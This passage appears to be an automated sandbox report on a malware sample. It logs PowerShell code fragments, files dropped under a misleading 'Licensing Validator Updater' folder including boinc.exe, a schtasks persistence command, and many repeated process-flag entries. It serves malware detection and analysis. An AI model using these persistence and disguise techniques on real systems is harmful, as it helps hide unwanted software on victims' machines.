Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFEB37A15E8 pushad ; retf 20_2_00007FFEB37A15E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFEB37A3D42 push edi; iretd 20_2_00007FFEB37A3D43
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFEB37A3D9D push edi; iretd 20_2_00007FFEB37A3D9E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFEB37A3CE7 push edi; iretd 20_2_00007FFEB37A3CE8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFEB37A3E4D push esi; iretd 20_2_00007FFEB37A3E51
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFEB39046C8 pushfd ; retf 20_2_00007FFEB39046D1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFEB3AE6D20 push esp; iretd 20_2_00007FFEB3AE6D29
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFEB3AE2A75 push edi; iretd 20_2_00007FFEB3AE2A76
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFEB379722E push esi; retf 35_2_00007FFEB3797237
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFEB37932CB push esp; iretd 35_2_00007FFEB37932CC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFEB3797510 push ebx; iretd 35_2_00007FFEB379753A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFEB3792520 push esp; retf 35_2_00007FFEB3792521
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFEB3793131 push ecx; ret 35_2_00007FFEB3793132
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFEB379563E push esi; retf 35_2_00007FFEB379563F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFEB38F3EE7 push ds; retf 35_2_00007FFEB38F3EEF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFEB38F7937 push ebx; retf 35_2_00007FFEB38F793A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFEB38F192B push ecx; ret 35_2_00007FFEB38F192C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe (copy)Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\firefox.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll (copy)Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Licensing Validator Updater\boinc.exeJump to dropped file
Source: C:\Program Files\Mozilla Firefox\firefox.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll.tmpJump to dropped file

Boot Survival

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn CleanUpMgrTask_1659166102
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
